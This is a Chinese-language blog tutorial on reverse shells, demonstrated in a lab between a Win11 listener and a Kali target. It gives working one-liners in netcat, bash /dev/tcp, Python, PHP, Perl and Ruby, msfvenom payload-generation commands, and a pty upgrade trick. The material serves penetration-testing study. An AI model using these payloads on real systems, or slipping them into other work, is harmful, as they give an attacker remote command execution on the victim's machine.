<!DOCTYPE html>



  


<html class="theme-next pisces use-motion" lang="zh-CN">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />






















<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=6.0.1" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png?v=6.0.1">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32.png?v=6.0.1">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16.png?v=6.0.1">


  <link rel="mask-icon" href="/images/logo.svg?v=6.0.1" color="#222">





  <meta name="keywords" content="Hexo, NexT" />










<meta name="description" content=".....">
<meta property="og:type" content="website">
<meta property="og:title" content="about">
<meta property="og:url" content="https://s1ient.github.io/about/index.html">
<meta property="og:site_name" content="S1ient">
<meta property="og:description" content=".....">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2023-03-08T08:53:18.000Z">
<meta property="article:modified_time" content="2023-03-08T08:53:44.561Z">
<meta property="article:author" content="S1ient">
<meta name="twitter:card" content="summary">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '6.0.1',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: false,
    fastclick: false,
    lazyload: false,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://s1ient.github.io/about/"/>





  <title>反弹 shell  | S1ient</title>
  








<meta name="generator" content="Hexo 4.2.1"></head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-CN">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"> <div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">S1ient</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">....</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            <i class="menu-item-icon fa fa-fw fa-home"></i> <br />Home</a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            <i class="menu-item-icon fa fa-fw fa-user"></i> <br />About</a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />Tags</a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            <i class="menu-item-icon fa fa-fw fa-th"></i> <br />Categories</a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />Archives</a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://s1ient.github.io/2023/03/16/%E5%8F%8D%E5%BC%B9-shell/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="S1ient">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="S1ient">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">反弹 shell </h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2023-03-16T20:55:44+08:00">2023-03-16</time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>[TOC]</p>
<a id="more"></a>

<h1 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h1><h2 id="含义"><a href="#含义" class="headerlink" title="含义"></a>含义</h2><p>反弹 shell，就是攻击机监听在某个 TCP&#x2F;UDP 端口为服务端，目标机主动发起请求到攻击机监听的端口，并将其命令行的输入输出转到攻击机。</p>
<h2 id="原理"><a href="#原理" class="headerlink" title="原理"></a>原理</h2><p>让对方目标机器主动连接攻击者机器（攻击者指定服务端，受害者主机主动连接攻击者的服务端程序）</p>
<blockquote>
<ol>
<li>攻击者 A 开启 2333 端口 TCP&#x2F;UDP 服务</li>
<li>受害者 B 连接 2333 端口 TCP&#x2F;UDP 服务</li>
<li>A、B 建立 TCP&#x2F;UDP 连接</li>
<li>A 通过 TCP&#x2F;UDP 服务将待执行命令发送到 B</li>
<li>B 执行命令后将结果发送给 A</li>
</ol>
</blockquote>
<h1 id="案例"><a href="#案例" class="headerlink" title="案例"></a>案例</h1><p>环境</p>
<blockquote>
<p>win11  192.168.3.155</p>
<p>kali  192.168.6.128</p>
</blockquote>
<p><a href="https://blog.csdn.net/muriyue6/article/details/107127217" target="_blank" rel="noopener">Windows 安装 netcat</a></p>
<p>kali 打开终端输入 <code>ip add</code></p>
<p><img src="/../image/%E5%8F%8D%E5%BC%B9-shell/1.png" alt="1"></p>
<p>win11 打开终端，输入 <code>ipcongif/all</code></p>
<p><img src="/../image/%E5%8F%8D%E5%BC%B9-shell/2.png" alt="2"></p>
<h2 id="linux-下反弹-shell"><a href="#linux-下反弹-shell" class="headerlink" title="linux 下反弹 shell"></a>linux 下反弹 shell</h2><h3 id="netcat-反弹-shell"><a href="#netcat-反弹-shell" class="headerlink" title="netcat 反弹 shell"></a>netcat 反弹 shell</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># win11  监听 2518 这个端口</span></span><br><span class="line"><span class="comment"># -l: 使用监听模式，管理和控制传入的数据</span></span><br><span class="line"><span class="comment"># -v: 详细输出</span></span><br><span class="line"><span class="comment"># -p&lt;通信端口&gt;: 设置本机使用的通信端口</span></span><br><span class="line">nc -lvvp 2518</span><br><span class="line"></span><br><span class="line"><span class="comment"># kali   -e 程序重定向</span></span><br><span class="line">nc 192.168.3.155 2518 -e /bin/bash</span><br></pre></td></tr></table></figure>

<p>这里我输错了好几次。。。</p>
<p>先 win11 输入命令，再到 kali 输入命令，可以看到 win11 出现了 <code>connect to</code> 字样，这个时候我们就可以在 win11 里面输入 <code>whoami</code> 以及 <code>ls</code> 等命令来获取目标机(kali)的信息了</p>
<p><img src="/../image/%E5%8F%8D%E5%BC%B9-shell/3.png" alt="3"></p>
<p>但是这个方法要求两边都安装 netcat，但若是目标机没有安装 netcat，那么这个方法就行不通</p>
<h3 id="bash-反弹-shell"><a href="#bash-反弹-shell" class="headerlink" title="bash 反弹 shell"></a>bash 反弹 shell</h3><p>使用 bash 结合重定向方法的一句话，具体命令如下：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># bash -i &gt;&amp; /dev/tcp/攻击机IP/攻击机端口 0&gt;&amp;1</span></span><br><span class="line">bash -i &gt;&amp; /dev/tcp/192.168.3.155/2518 0&gt;&amp;1</span><br><span class="line">或</span><br><span class="line">bash -c <span class="string">"bash -i &gt;&amp; /dev/tcp/192.168.3.155/2518 0&gt;&amp;1"</span></span><br></pre></td></tr></table></figure>

<p>以下是针对Bash反弹一句话进行了拆分说明：</p>
<table>
<thead>
<tr>
<th align="left">命令</th>
<th align="left">命令详解</th>
</tr>
</thead>
<tbody><tr>
<td align="left">bash -i</td>
<td align="left">产生一个 bash 交互环境。</td>
</tr>
<tr>
<td align="left">&gt;&amp;</td>
<td align="left">将联合符号前面的内容与后面相结合，然后一起重定向给后者。</td>
</tr>
<tr>
<td align="left">&#x2F;dev&#x2F;tcp&#x2F;192.168.3.155&#x2F;2518</td>
<td align="left">Linux 环境中所有的内容都是以文件的形式存在的，就是让目标主机与攻击机 192.168.3.155 的 2518 端口建立一个tcp连接。</td>
</tr>
<tr>
<td align="left">0&gt;&amp;1</td>
<td align="left">将标准输入与标准输出的内容相结合，然后重定向给前面标准输出的内容。</td>
</tr>
</tbody></table>
<p>按道理这个是可以的，我在很多文章都看到了这个方法，但是我一直显示没有那个目录，一脸懵逼…</p>
<h2 id="脚本反弹-shell"><a href="#脚本反弹-shell" class="headerlink" title="脚本反弹 shell"></a>脚本反弹 shell</h2><h3 id="python-反弹-shell"><a href="#python-反弹-shell" class="headerlink" title="python 反弹 shell"></a>python 反弹 shell</h3><p>当目标主机上有 python 环境时，我们可以用 Python 来反弹 shell。</p>
<p><strong>攻击机（win 11）监听 2518 端口</strong></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nc -lvvp 2518</span><br></pre></td></tr></table></figure>

<p><strong>目标机（kali）执行下列命令</strong></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python3 -c <span class="string">'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.3.155",2518));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'</span></span><br></pre></td></tr></table></figure>

<p><img src="/../image/%E5%8F%8D%E5%BC%B9-shell/4.png" alt="4"></p>
<h3 id="php-脚本反弹-shell"><a href="#php-脚本反弹-shell" class="headerlink" title="php 脚本反弹 shell"></a>php 脚本反弹 shell</h3><p><strong>攻击机（win 11）监听 2518 端口</strong></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nc -lvvp 2518</span><br></pre></td></tr></table></figure>

<p><strong>目标机（kali）执行下列命令</strong></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">php -r <span class="string">'$sock=fsockopen("192.168.3.155",2518);exec("/bin/sh -i &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3");'</span></span><br></pre></td></tr></table></figure>

<p><img src="/../image/%E5%8F%8D%E5%BC%B9-shell/5.png" alt="5"></p>
<h3 id="Perl-脚本反弹shell"><a href="#Perl-脚本反弹shell" class="headerlink" title="Perl 脚本反弹shell"></a><strong>Perl 脚本反弹shell</strong></h3><p>当目标主机上有perl环境时，我们可以用perl来反弹shell。</p>
<p><strong>攻击机开启本地监听：</strong></p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nc -lvvp <span class="number">2518</span></span><br></pre></td></tr></table></figure>

<p><strong>目标机主动连接攻击机：</strong></p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">perl -e <span class="string">'use Socket;$i="192.168.3.155";$p=2518;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i))))&#123;open(STDIN,"&gt;&amp;S");open(STDOUT,"&gt;&amp;S");open(STDERR,"&gt;&amp;S");exec("/bin/sh -i");&#125;;'</span></span><br></pre></td></tr></table></figure>

<p>执行效果如下：</p>
<p><img src="/../image/%E5%8F%8D%E5%BC%B9-shell/6.png" alt="6"></p>
<h3 id="Ruby脚本反弹shell"><a href="#Ruby脚本反弹shell" class="headerlink" title="Ruby脚本反弹shell"></a><strong>Ruby脚本反弹shell</strong></h3><p>当目标主机上有 ruby 环境时，我们可以用 ruby 来反弹 shell。</p>
<p><strong>攻击机开启本地监听：</strong></p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nc -lvvp <span class="number">2518</span></span><br></pre></td></tr></table></figure>

<p><strong>目标机主动连接攻击机：</strong></p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">ruby -rsocket -e <span class="string">'c=TCPSocket.new("192.168.3.155","2518");while(cmd=c.gets);IO.popen(cmd,"r")&#123;|io|c.print io.read&#125;end'</span></span><br><span class="line">或</span><br><span class="line">ruby -rsocket -e <span class="string">'exit if fork;c=TCPSocket.new("192.168.3.155","2518");while(cmd=c.gets);IO.popen(cmd,"r")&#123;|io|c.print io.read&#125;end'</span></span><br></pre></td></tr></table></figure>

<p>执行效果如下：</p>
<p><img src="/../image/%E5%8F%8D%E5%BC%B9-shell/7.png" alt="7"></p>
<h2 id="使用-Metasploit-生成反弹-shell-用的一句话"><a href="#使用-Metasploit-生成反弹-shell-用的一句话" class="headerlink" title="使用 Metasploit 生成反弹 shell 用的一句话"></a><strong>使用 Metasploit 生成反弹 shell 用的一句话</strong></h2><p>强大的 Metasploit 框架也为我们提供了生成一句话反弹 shell 的工具，即 <code>msfvenom</code>，绝对的实用。当我们不记得前面说的所有反弹 shell 的反弹语句时，只要我们有 Metasploit，那么我们随时都可以使用 <code>msfvenom -l</code> 来查询生成我们所需要的各类命令行一句话，具体使用方法如下。</p>
<p>我们直接可以使用 <code>msfvenom -l</code> 结合关键字过滤（如cmd&#x2F;unix&#x2F;reverse），列出我们需要生成的各类反弹 shell 一句话的 payload 的路径</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -l payloads | grep <span class="string">'cmd/unix/reverse'</span></span><br></pre></td></tr></table></figure>

<p><img src="/../image/%E5%8F%8D%E5%BC%B9-shell/8.png" alt="8"></p>
<p>如上图所示，metasploit 支持生成反弹 shell 一句话的类型非常丰富，大家可以依据渗透测试对象自行选择使用。</p>
<p>比如，我们获取一个 python 反弹 shell 的一句话：</p>
<figure class="highlight cmd"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -p <span class="built_in">cmd</span>/unix/reverse_python LHOST=<span class="number">192</span>.<span class="number">168</span>.<span class="number">3</span>.<span class="number">155</span> LPORT=<span class="number">2518</span> -f raw</span><br></pre></td></tr></table></figure>

<p>而且他还对我们的一句话进行了编码</p>
<p><img src="/../image/%E5%8F%8D%E5%BC%B9-shell/9.png" alt="9"></p>
<p>测试一下，一样可以连接</p>
<p><img src="/../image/%E5%8F%8D%E5%BC%B9-shell/10.png" alt="10"></p>
<p>想要获取其他脚本的一句话 shell，最开始给了路径，只需要修改 -p 后面的参数就行了</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -p cmd/unix/reverse_bash lhost=192.168.3.155 lport=2518 -f raw     <span class="comment"># bash 反弹一句话</span></span><br><span class="line">msfvenom -p cmd/unix/reverse_netcat lhost=192.168.3.155 lport=2518 -f raw     <span class="comment"># nc 反弹一句话</span></span><br><span class="line">msfvenom -p cmd/unix/reverse_python lhost=192.168.3.155 lport=2518 -f raw   <span class="comment"># python 反弹一句话</span></span><br><span class="line">msfvenom -p cmd/unix/reverse_perl lhost=192.168.3.155 lport=2518 -f raw     <span class="comment"># perl 反弹一句话</span></span><br><span class="line">msfvenom -p cmd/unix/reverse_ruby lhost=192.168.3.155 lport=2518 -f raw     <span class="comment"># ruby 反弹一句话</span></span><br></pre></td></tr></table></figure>

<h2 id="反弹-shell-后获取模拟终端"><a href="#反弹-shell-后获取模拟终端" class="headerlink" title="反弹 shell 后获取模拟终端"></a><strong>反弹 shell 后获取模拟终端</strong></h2><p>其实，上面所讲的各种方法获取的 shell 都不是一个标准的虚拟终端环境，它仅仅是一个标准输入。</p>
<p>你会发现存在一个问题，就是即使我们获取了目标虚拟终端控制权限，但是往往会发现其交互性非常的差，回显信息与可交互性非常的差和不稳定，具体见情况有以下几个种。</p>
<blockquote>
<p>•获取的虚拟终端没有交互性，我们想给添加的账号设置密码或执行 sudo 等命令，无法完成。</p>
<p>•标准的错误输出无法显示，无法正常使用 vim 等文本编辑器等。</p>
<p>•获取的目标主机的虚拟终端使用非常不稳定，很容易断开连接。</p>
</blockquote>
<p>这往往都是因为我们获取的 shell 并不是标准的虚拟终端，为了能够完成输入密码等操作，我们必须模拟一个真正的终端设备。</p>
<p>我们其实可以借助于 python 默认包含的一个 pty 标准库来获取一个标准的虚拟终端环境。</p>
<p>我们只需在获取的 shell 里面输入如下命令，即可模拟一个终端设备：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python -c <span class="string">"import pty;pty.spawn('/bin/bash')"</span></span><br></pre></td></tr></table></figure>

<p>对比前后，是不是后面一种看起来舒服多了，只是我这里有点乱吗，编码没有设置好…</p>
<p><img src="/../image/%E5%8F%8D%E5%BC%B9-shell/11.png" alt="11"></p>
<p>怎么解决这个乱码问题呢？</p>
<p>win 11 输入下列命令后再去 nc 就不会乱码了！</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">chcp 65001</span><br></pre></td></tr></table></figure>


      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/web/" rel="tag"><i class="fa fa-tag">web</i></a>
          
            <a href="/tags/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/" rel="tag"><i class="fa fa-tag">渗透测试</i></a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2023/03/15/%E5%BA%94%E6%80%A5%E5%8A%A0%E5%9B%BA/" rel="next" title="应急加固">
                <i class="fa fa-chevron-left"></i> 应急加固
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2023/03/19/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%951/" rel="prev" title="渗透测试1">
                渗透测试1 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">S1ient</p>
              <p class="site-description motion-element" itemprop="description">.....</p>
          </div>

          
            <nav class="site-state motion-element">
              
                <div class="site-state-item site-state-posts">
                
                  <a href="/">
                
                    <span class="site-state-item-count">13</span>
                    <span class="site-state-item-name">posts</span>
                  </a>
                </div>
              

              
                
                
                <div class="site-state-item site-state-categories">
                  <a href="/categories/index.html">
                    <span class="site-state-item-count">3</span>
                    <span class="site-state-item-name">categories</span>
                  </a>
                </div>
              

              
                
                
                <div class="site-state-item site-state-tags">
                  <a href="/tags/index.html">
                    <span class="site-state-item-count">14</span>
                    <span class="site-state-item-name">tags</span>
                  </a>
                </div>
              
            </nav>
          

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#简介"><span class="nav-number">1.</span> <span class="nav-text">简介</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#含义"><span class="nav-number">1.1.</span> <span class="nav-text">含义</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#原理"><span class="nav-number">1.2.</span> <span class="nav-text">原理</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#案例"><span class="nav-number">2.</span> <span class="nav-text">案例</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#linux-下反弹-shell"><span class="nav-number">2.1.</span> <span class="nav-text">linux 下反弹 shell</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#netcat-反弹-shell"><span class="nav-number">2.1.1.</span> <span class="nav-text">netcat 反弹 shell</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#bash-反弹-shell"><span class="nav-number">2.1.2.</span> <span class="nav-text">bash 反弹 shell</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#脚本反弹-shell"><span class="nav-number">2.2.</span> <span class="nav-text">脚本反弹 shell</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#python-反弹-shell"><span class="nav-number">2.2.1.</span> <span class="nav-text">python 反弹 shell</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#php-脚本反弹-shell"><span class="nav-number">2.2.2.</span> <span class="nav-text">php 脚本反弹 shell</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Perl-脚本反弹shell"><span class="nav-number">2.2.3.</span> <span class="nav-text">Perl 脚本反弹shell</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Ruby脚本反弹shell"><span class="nav-number">2.2.4.</span> <span class="nav-text">Ruby脚本反弹shell</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#使用-Metasploit-生成反弹-shell-用的一句话"><span class="nav-number">2.3.</span> <span class="nav-text">使用 Metasploit 生成反弹 shell 用的一句话</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#反弹-shell-后获取模拟终端"><span class="nav-number">2.4.</span> <span class="nav-text">反弹 shell 后获取模拟终端</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2023</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">S1ient</span>

  

  
</div>
<!--

  <div class="powered-by">Powered by <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a></div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Theme &mdash; <a class="theme-link" target="_blank" href="https://github.com/theme-next/hexo-theme-next">NexT.Pisces</a> v6.0.1</div>



-->
        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>


























  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=6.0.1"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=6.0.1"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=6.0.1"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=6.0.1"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=6.0.1"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=6.0.1"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=6.0.1"></script>



  



	





  





  










  





  

  

  

  
  

  

  

  

</body>
</html>
